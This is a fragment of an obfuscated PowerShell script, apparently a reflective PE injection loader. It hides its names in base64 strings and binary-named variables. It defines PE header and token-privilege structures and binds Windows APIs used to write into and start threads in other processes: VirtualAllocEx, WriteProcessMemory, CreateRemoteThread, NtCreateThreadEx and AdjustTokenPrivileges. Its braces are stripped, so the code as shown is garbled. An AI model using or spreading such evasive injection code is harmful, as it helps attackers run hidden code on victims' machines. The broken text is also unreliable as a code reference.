${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8AUgBlAGwAbwBjAGEAdABpAG8AbgBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8ATABpAG4AZQBuAHUAbQBiAGUAcgBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFIAZQBsAG8AYwBhAHQAaQBvAG4AcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAEwAaQBuAGUAbgB1AG0AYgBlAHIAcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10111010011010101} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value ${10111010011010101}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AQgBBAFMARQBfAFIARQBMAE8AQwBBAFQASQBPAE4A'))), ${01001001010001110}, [System.ValueType], 8)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGQAZAByAGUAcwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAQgBsAG8AYwBrAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01011100001010010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value ${01011100001010010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ASQBNAFAATwBSAFQAXwBEAEUAUwBDAFIASQBQAFQATwBSAA=='))), ${01001001010001110}, [System.ValueType], 20)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBEAGEAdABlAFMAdABhAG0AcAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBvAHIAdwBhAHIAZABlAHIAQwBoAGEAaQBuAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAHIAcwB0AFQAaAB1AG4AawA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${00001011010111101} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value ${00001011010111101}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARQBYAFAATwBSAFQAXwBEAEkAUgBFAEMAVABPAFIAWQA='))), ${01001001010001110}, [System.ValueType], 40)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBEAGEAdABlAFMAdABhAG0AcAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAEYAdQBuAGMAdABpAG8AbgBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAE4AYQBtAGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYARgB1AG4AYwB0AGkAbwBuAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYATgBhAG0AZQBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYATgBhAG0AZQBPAHIAZABpAG4AYQBsAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10010100001011010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value ${10010100001011010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABVAEkARAA='))), ${01001001010001110}, [System.ValueType], 8)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAHcAUABhAHIAdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABpAGcAaABQAGEAcgB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01010110100111001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value ${01010110100111001}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABVAEkARABfAEEATgBEAF8AQQBUAFQAUgBJAEIAVQBUAEUAUwA='))), ${01001001010001110}, [System.ValueType], 12)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TAB1AGkAZAA='))), ${01010110100111001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AHQAcgBpAGIAdQB0AGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01001111101101010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value ${01001111101101010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABPAEsARQBOAF8AUABSAEkAVgBJAEwARQBHAEUAUwA='))), ${01001001010001110}, [System.ValueType], 16)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAdgBpAGwAZQBnAGUAQwBvAHUAbgB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAdgBpAGwAZQBnAGUAcwA='))), ${01001111101101010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10100111101010001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value ${10100111101010001}
return $Win32Types
Function _10101001111100001
$Win32Constants = New-Object System.Object
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
return $Win32Constants
Function _01011100100111011
$Win32Functions = New-Object System.Object
${00100001110111000} = _10001000101010101 kernel32.dll VirtualAlloc
${00110111111110111} = _00101111101010001 @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
${00100110111101100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00100001110111000}, ${00110111111110111})
$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value ${00100110111101100}
${10110000011111111} = _10001000101010101 kernel32.dll VirtualAllocEx
${01011010010011100} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
${00110110000100100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10110000011111111}, ${01011010010011100})
$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value ${00110110000100100}
${01001111011111111} = _10001000101010101 msvcrt.dll memcpy
${01010100111010101} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
${01110000000000011} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01001111011111111}, ${01010100111010101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value ${01110000000000011}
${01100010001110111} = _10001000101010101 msvcrt.dll memset
${10011011011111100} = _00101111101010001 @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
${01111010110111100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01100010001110111}, ${10011011011111100})
$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value ${01111010110111100}
${10001110110100001} = _10001000101010101 kernel32.dll LoadLibraryA
${00010010001001101} = _00101111101010001 @([String]) ([IntPtr])
${00101101100000111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10001110110100001}, ${00010010001001101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value ${00101101100000111}
${00101100001110101} = _10001000101010101 kernel32.dll GetProcAddress
${01001110110110010} = _00101111101010001 @([IntPtr], [String]) ([IntPtr])
${00101011111111000} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00101100001110101}, ${01001110110110010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value ${00101011111111000}
${01011011000010101} = _10001000101010101 kernel32.dll GetProcAddress
${01000010101101010} = _00101111101010001 @([IntPtr], [IntPtr]) ([IntPtr])
${00000110100100110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01011011000010101}, ${01000010101101010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value ${00000110100100110}
${01110011000010011} = _10001000101010101 kernel32.dll VirtualFree
${10001110100111011} = _00101111101010001 @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
${01011110001000001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01110011000010011}, ${10001110100111011})
$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value ${01011110001000001}
${00010011111110101} = _10001000101010101 kernel32.dll VirtualFreeEx
${01001101011101111} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
${10001000101110101} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00010011111110101}, ${01001101011101111})
$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value ${10001000101110101}
${01111011010110110} = _10001000101010101 kernel32.dll VirtualProtect
${00111101000101100} = _00101111101010001 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
${00001101010110001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01111011010110110}, ${00111101000101100})
$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value ${00001101010110001}
${00110001110111111} = _10001000101010101 kernel32.dll GetModuleHandleA
${00101100101101101} = _00101111101010001 @([String]) ([IntPtr])
${10100001011111110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00110001110111111}, ${00101100101101101})
$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value ${10100001011111110}
${10111000010011010} = _10001000101010101 kernel32.dll FreeLibrary
${00111011101111101} = _00101111101010001 @([IntPtr]) ([Bool])
${00011100000000001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111000010011010}, ${00111011101111101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value ${00011100000000001}
${10100010000101000} = _10001000101010101 kernel32.dll OpenProcess
${01110101100000101} = _00101111101010001 @([UInt32], [Bool], [UInt32]) ([IntPtr])
${00101011000011110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10100010000101000}, ${01110101100000101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value ${00101011000011110}
${10000101101000001} = _10001000101010101 kernel32.dll WaitForSingleObject
${00010100100010101} = _00101111101010001 @([IntPtr], [UInt32]) ([UInt32])
${00111100101100110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10000101101000001}, ${00010100100010101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value ${00111100101100110}
${00111011100000100} = _10001000101010101 kernel32.dll WriteProcessMemory
${10010110111110101} = _00101111101010001 @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
${00011001001001100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00111011100000100}, ${10010110111110101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value ${00011001001001100}
${10001101011111000} = _10001000101010101 kernel32.dll ReadProcessMemory
${10101011101111000} = _00101111101010001 @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
${00110111101100111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10001101011111000}, ${10101011101111000})
$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value ${00110111101100111}
${10111111000010101} = _10001000101010101 kernel32.dll CreateRemoteThread
${00001101011111111} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
${10101000000010001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111111000010101}, ${00001101011111111})
$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value ${10101000000010001}
${01001101111010000} = _10001000101010101 kernel32.dll GetExitCodeThread
${10010010110011101} = _00101111101010001 @([IntPtr], [Int32].MakeByRefType()) ([Bool])
${10000101101110011} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01001101111010000}, ${10010010110011101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value ${10000101101110011}
${00100000010001100} = _10001000101010101 Advapi32.dll OpenThreadToken
${01101110011100100} = _00101111101010001 @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
${00111011100101010} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00100000010001100}, ${01101110011100100})
$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value ${00111011100101010}
${10101100110011110} = _10001000101010101 kernel32.dll GetCurrentThread
${01100010110001010} = _00101111101010001 @() ([IntPtr])
${01011111011101111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10101100110011110}, ${01100010110001010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value ${01011111011101111}
${00010101110111111} = _10001000101010101 Advapi32.dll AdjustTokenPrivileges
${00101010001001111} = _00101111101010001 @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
${00110100100011000} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00010101110111111}, ${00101010001001111})
$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value ${00110100100011000}
${10000110001101100} = _10001000101010101 Advapi32.dll LookupPrivilegeValueA
${01100001100000000} = _00101111101010001 @([String], [String], [IntPtr]) ([Bool])
${00110011000101110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10000110001101100}, ${01100001100000000})
$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value ${00110011000101110}
${00110110111011101} = _10001000101010101 Advapi32.dll ImpersonateSelf
${01010000011011010} = _00101111101010001 @([Int32]) ([Bool])
${01110110001101001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00110110111011101}, ${01010000011011010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value ${01110110001101001}
if (([Environment]::OSVersion.Version -ge (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,2))) {
${01000001000010010} = _10001000101010101 NtDll.dll NtCreateThreadEx
${01010001100011101} = _00101111101010001 @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
${01010010100100100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01000001000010010}, ${01010001100011101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value ${01010010100100100}
}
${01011101011010101} = _10001000101010101 Kernel32.dll IsWow64Process
${00100000011001000} = _00101111101010001 @([IntPtr], [Bool].MakeByRefType()) ([Bool])
${00100100010111010} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01011101011010101}, ${00100000011001000})
$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value ${00100100010111010}
${10111101100101001} = _10001000101010101 Kernel32.dll CreateThread
${10011100110001101} = _00101111101010001 @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
${00100001001001010} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111101100101001}, ${10011100110001101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value ${00100001001001010}
return $Win32Functions
Function _10000100001010111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
${_01001011110000011},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_00111110010011101}
[Byte[]]${01001111110100001} = [BitConverter]::GetBytes(${_01001011110000011})
[Byte[]]${10001000000000100} = [BitConverter]::GetBytes(${_00111110010011101})
[Byte[]]${01011100110011010} = [BitConverter]::GetBytes([UInt64]0)
if (${01001111110100001}.Count -eq ${10001000000000100}.Count)
${10000010011001001} = 0
for (${01101000000100101} = 0; ${01101000000100101} -lt ${01001111110100001}.Count; ${01101000000100101}++)
${10100010010110000} = ${01001111110100001}[${01101000000100101}] - ${10000010011001001}
if (${10100010010110000} -lt ${10001000000000100}[${01101000000100101}])
${10100010010110000} += 256
${10000010011001001} = 1
${10000010011001001} = 0
[UInt16]${00100011101111011} = ${10100010010110000} - ${10001000000000100}[${01101000000100101}]
${01011100110011010}[${01101000000100101}] = ${00100011101111011} -band 0x00FF
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIABzAHUAYgB0AHIAYQBjAHQAIABiAHkAdABlAGEAcgByAGEAeQBzACAAbwBmACAAZABpAGYAZgBlAHIAZQBuAHQAIABzAGkAegBlAHMA')))
return [BitConverter]::ToInt64(${01011100110011010}, 0)
Function _01101001110001101
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
${_01001011110000011},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_00111110010011101}
[Byte[]]${01001111110100001} = [BitConverter]::GetBytes(${_01001011110000011})
[Byte[]]${10001000000000100} = [BitConverter]::GetBytes(${_00111110010011101})
[Byte[]]${01011100110011010} = [BitConverter]::GetBytes([UInt64]0)
if (${01001111110100001}.Count -eq ${10001000000000100}.Count)
${10000010011001001} = 0
for (${01101000000100101} = 0; ${01101000000100101} -lt ${01001111110100001}.Count; ${01101000000100101}++)
[UInt16]${00100011101111011} = ${01001111110100001}[${01101000000100101}] + ${10001000000000100}[${01101000000100101}] + ${10000010011001001}
${01011100110011010}[${01101000000100101}] = ${00100011101111011} -band 0x00FF
if ((${00100011101111011} -band 0xFF00) -eq 0x100)
${10000010011001001} = 1
${10000010011001001} = 0
